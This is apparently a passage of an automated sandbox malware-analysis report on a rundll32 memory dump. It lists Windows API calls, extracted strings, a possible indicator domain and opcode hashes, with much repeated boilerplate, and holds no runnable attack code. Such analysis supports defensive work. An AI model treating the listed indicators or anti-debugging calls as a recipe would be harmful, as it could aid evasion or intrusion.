                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EF4E083
                          • IsDebuggerPresent.KERNEL32 ref: 7EF4E14F
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EF4E168
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 7EF4E172
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$@$`
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: @
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF673C2
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF6740C
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF674D2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale$ErrorLast
                          • String ID:
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7EF51FFE
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7EF52008
                          • UnhandledExceptionFilter.KERNEL32(7EF71D18,?,?,?,?,?,00000000), ref: 7EF52015
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$@$PE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: e$e
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memcpy_s
                          • String ID: |J$D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: YkJW$corepatchcraft.com
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,7EF36F6B,00000000,?,?,7EF313DB,?,0000000B), ref: 7EF5B809
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 7EF5B828
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7EF5E278,?,?,00000008,?,?,7EF6D7B5,00000000), ref: 7EF5E4AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7EF4DE42
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <nHP}PPS_]HYtY]L
                          • API String ID: 0-2977282155
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF67615
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF6736E,00000001,00000000,?,-00000050,?,7EF6799F,00000000,?,?,?,00000055,?), ref: 7EF672BA
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7EF6758A,00000000,00000000,?), ref: 7EF6781C
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF675C1,00000001,00000000,?,-00000050,?,7EF67963,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7EF6732D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          APIs
                            • Part of subcall function 7EF5C0A0: EnterCriticalSection.KERNEL32(-7EF8B618,?,7EF5DA8E,?,7EF82848,0000000C,7EF5DD78,7EF72040), ref: 7EF5C0AF
                          • EnumSystemLocalesW.KERNEL32(7EF60A92,00000001,7EF82988,0000000C,7EF60F18,00000000), ref: 7EF60AD7
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF67156,00000001,00000000,?,?,7EF679C1,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7EF67234
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7EF60108,?,20001004,00000000,00000002,?,?,7EF5F70A), ref: 7EF61050
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: WORKGROUP
                          • API String ID: 0-2380569353
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          • API String ID: 3758378126-2525114547
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: e
                          • API String ID: 0-4024072794
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          • API String ID: 3758378126-2525114547
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/A
                          • API String ID: 0-2525114547
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/A
                          • API String ID: 0-2525114547
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                          • String ID:
                          • API String ID: 3471368781-0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                          • Instruction ID: 7072220035980dc3b5673b5d5ee6df82bac6efdefcc8a1cfd6656c88662b7f80
                          • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                          • Instruction Fuzzy Hash: 59B1A378E00259DFCB14CF99C590AADFBB2FF89304F208199E859A7755D770AA82CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c1eab5970cad5bb778bd9befc4fd4b303cf43b4b0819ed0f1a60980bec7a5fb
                          • Instruction ID: da098c33e59aaa69e0752d89aad55da6432b4827a15e410d29e58889426fc5b3
                          • Opcode Fuzzy Hash: 4c1eab5970cad5bb778bd9befc4fd4b303cf43b4b0819ed0f1a60980bec7a5fb
                          • Instruction Fuzzy Hash: DA9190B8E05219DFCB08CF99D4A0AADFBB2FF49304F208199D819AB745D735A941CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02510fa4ddcc40002b41ec08a4154023d6121cc6ad1b2a63791fc30a8c19f5a2
                          • Instruction ID: d6a2f313ce0ff56445f0e1919263596581ffe4e081067dede1bb143743768bce
                          • Opcode Fuzzy Hash: 02510fa4ddcc40002b41ec08a4154023d6121cc6ad1b2a63791fc30a8c19f5a2
                          • Instruction Fuzzy Hash: 1B81B1B8E05249DFCB04CFA9C490AADFBB5BF48304F248169D859AB745D735A942CF90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3b8d71ed562dd4e341cb6740745bf84566a667071f26c71fdcafb569e23361f
                          • Instruction ID: be39727337ce585e9df485b38678156396c28cd71ad1ef0bc2b4630754666baf
                          • Opcode Fuzzy Hash: f3b8d71ed562dd4e341cb6740745bf84566a667071f26c71fdcafb569e23361f
                          • Instruction Fuzzy Hash: F3518F76E01219EFDF05CF99C950AAEBBB2FF88310F19845DE805AB345C7349A50CBA4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                          • Instruction ID: 7ddb9084ebefb5655d44312387ddbeabbabe0ce1b3434fe74f8c9238032fc9fd
                          • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                          • Instruction Fuzzy Hash: 97818F78E05259DFCB04CF99C590AEDFBB1BF48304F20819AE855AB345D734AA85CF94
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                          • Instruction ID: 2b1c9a459e4ea135e6de4b01300763463407fdd52a361832df04550a7a7826b3
                          • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                          • Instruction Fuzzy Hash: 13719178E00259CFCB18CF99C490AEDFBB2BF89310F248199E859A7755D774A982CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7f06e0b756b3738925b886ea3f5f532933d1f2902601309f52d1adc5058e23e
                          • Instruction ID: de0f30647b9a89863cb88ef89320d31c00bd88b550c5831cedcaeb7618dd02dd
                          • Opcode Fuzzy Hash: f7f06e0b756b3738925b886ea3f5f532933d1f2902601309f52d1adc5058e23e
                          • Instruction Fuzzy Hash: F7619078E04659DFCB04CF99C490AADFBB6FF88304F20816AD855AB355D730AA41CF54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8c469c0f059664ea4d87ccfa01e93c0f5d0381e0c635f7cfa9adb321424bdf8
                          • Instruction ID: 69f07b00cb0c0b2b0a45652bdaceb6af2a79b1fadf0c86cd1ec5ae0cf92b1c62
                          • Opcode Fuzzy Hash: d8c469c0f059664ea4d87ccfa01e93c0f5d0381e0c635f7cfa9adb321424bdf8
                          • Instruction Fuzzy Hash: 96619FB8E04259DFCB04CFA9C490AADFBF1BF49304F24815AD815AB745D734AA42CF90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction ID: 532d914e841c88ac57357cd2db736c965194e65536ad52d69ce6b5ef80244fbc
                          • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction Fuzzy Hash: 9F619D78E05259DFCB08CF99C590AADFBF2BF48304F24819AD815AB745D734AA41CF90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction ID: a84d972bf0901867be44f0799e2b9b7a5f6141746f49e58042d3e3a2b7ec8d8a
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: C311987F241191C3E705892ED4F4BA6AFEAFAD7232B29637BD043CFE58D12291459600
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1386c6d2ee232ee394527a7f01d130c71a346f90cccf96890af4b33ce53c8704
                          • Instruction ID: bcee315a13d4c88b0491e9c872ce06af62c0e409d37d2a5ae3c822a2ae8312f8
                          • Opcode Fuzzy Hash: 1386c6d2ee232ee394527a7f01d130c71a346f90cccf96890af4b33ce53c8704
                          • Instruction Fuzzy Hash: F2F0903A654224DBC712FA5D9538B99F7FCF705B14F110256E602DBEA4C6A2DE4087C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96c021c13fd54b173c1d8bbef0e8e843ad7d40f7737c88c1f2b3ca5334f97305
                          • Instruction ID: 196012e2a8bcbe4eff07dd58d7d3bec262e206b96b9adaf2a1c5a74f00518ae4
                          • Opcode Fuzzy Hash: 96c021c13fd54b173c1d8bbef0e8e843ad7d40f7737c88c1f2b3ca5334f97305
                          • Instruction Fuzzy Hash: 76F02D7A500208DBEB61DFA5CC54FCBB7FCEB91210F002951E555A3811D770FA408A90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe75b45c117c74acfb25d8e611710b3bb80060be2b5c4bb08e6f3b68fd129a3e
                          • Instruction ID: afd2507e017fbfb6d5e67eab4f57aa3f3f7dfcce2050070e7c24db2f249ec2e4
                          • Opcode Fuzzy Hash: fe75b45c117c74acfb25d8e611710b3bb80060be2b5c4bb08e6f3b68fd129a3e
                          • Instruction Fuzzy Hash: 54F03976A202A5EBDB22EA4CC514A89B3FCEB45B54F214096E502E7A41CAB4DE00CBD0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
